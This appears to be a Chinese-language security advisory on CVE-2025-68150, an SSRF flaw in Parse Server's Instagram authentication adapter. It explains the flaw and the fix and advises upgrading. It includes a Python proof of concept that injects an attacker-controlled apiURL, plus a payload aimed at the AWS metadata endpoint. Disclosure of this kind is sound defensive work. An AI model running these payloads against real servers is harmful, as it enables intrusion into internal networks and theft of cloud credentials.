CVE-2025-68150: Parse Server Instagram认证适配器SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-68150

漏洞类型

服务器端请求伪造（SSRF）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Parse Server

漏洞概述

Parse Server是一个开源的后端服务框架，可以部署在任何可以运行Node.js的基础设施上。该漏洞存在于Parse Server的Instagram认证适配器中。在8.6.2和9.1.1-alpha.1之前的版本中，Instagram认证适配器允许客户端通过authData中的apiURL参数指定自定义的API URL。这个设计缺陷使得攻击者可以控制Instagram Graph API的请求目标，从而发起服务器端请求伪造（SSRF）攻击。攻击者可以利用此漏洞让Parse Server服务器向内部网络资源、敏感服务或恶意外部服务器发起请求。此外，如果恶意端点返回伪造的响应来验证未经授权的用户，还可能导致认证绕过。该漏洞的CVSS评分为6.5，属于中等严重程度，攻击向量为网络，认证要求低权限，无需用户交互，对机密性有较高影响。

技术细节

Parse Server的Instagram认证适配器在处理用户认证时，会从客户端提供的authData中读取apiURL参数。攻击者可以通过构造恶意的authData，将apiURL指向任意URL（包括内部网络地址如localhost、127.0.0.1或内网IP段）。当Parse Server执行Instagram Graph API调用时，它会使用攻击者指定的URL而不是官方的Instagram Graph API端点（https://graph.instagram.com）。这使得攻击者可以：1）探测内网服务，识别运行在防火墙后的服务；2）读取本地文件或访问内部API端点；3）通过让恶意服务器返回伪造的Instagram认证响应，绕过正常的用户验证流程。漏洞的根本原因在于认证适配器信任了客户端可控的输入参数，而没有对API端点进行严格的验证或使用白名单机制。修复版本通过硬编码Instagram Graph API URL（https://graph.instagram.com）并忽略客户端提供的apiURL值来消除此风险。

攻击链分析

STEP 1

步骤1

攻击者准备恶意Instagram认证数据，在authData中注入自定义的apiURL参数，指向攻击者控制或内部网络地址

STEP 2

步骤2

攻击者向Parse Server发送用户登录或注册请求，包含恶意的authData

STEP 3

步骤3

Parse Server的Instagram认证适配器接收请求，提取apiURL参数值

STEP 4

步骤4

认证适配器使用攻击者指定的URL（而非官方Instagram Graph API）发起HTTP请求

STEP 5

步骤5

如果apiURL指向内部服务，攻击者可以读取内网资源、探测服务或获取敏感信息（SSRF）

STEP 6

步骤6

如果攻击者控制apiURL指向的服务器并返回伪造的认证响应，可能绕过用户验证流程（认证绕过）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-68150 SSRF PoC
# Target: Parse Server with vulnerable Instagram auth adapter

TARGET_URL = "http://target-parse-server.com/parse"
ATTACKER_SERVER = "http://attacker-controlled-server.com"

def exploit_ssrf():
    """
    This PoC demonstrates how an attacker can abuse the apiURL parameter
    in Instagram authData to perform SSRF attacks.
    """
    # Malicious authData with custom apiURL pointing to attacker-controlled server
    malicious_auth_data = {
        "instagram": {
            "id": "malicious_user_id",
            "access_token": "fake_access_token",
            "apiURL": ATTACKER_SERVER  # Attacker controls this URL
        }
    }
    
    # Login request with malicious authData
    login_payload = {
        "authData": malicious_auth_data
    }
    
    # Alternative: SSRF to internal services
    internal_ssrf_payload = {
        "authData": {
            "instagram": {
                "id": "test_user",
                "access_token": "test_token",
                "apiURL": "http://169.254.169.254/latest/meta-data/"  # AWS metadata
            }
        }
    }
    
    try:
        # Send request to Parse Server
        response = requests.post(
            f"{TARGET_URL}/users",
            json=login_payload,
            headers={"Content-Type": "application/json"}
        )
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-68150 SSRF PoC")
    print("Target: Parse Server Instagram Auth Adapter")
    exploit_ssrf()

影响范围

Parse Server < 8.6.2

Parse Server < 9.1.1-alpha.1

防御指南

临时缓解措施

目前没有已知的临时缓解措施可以完全消除此漏洞风险。建议所有使用Parse Server Instagram认证功能的用户立即升级到修复版本（8.6.2或9.1.1-alpha.1）。如果无法立即升级，应考虑暂时禁用Instagram认证功能，并监控异常的网络请求活动。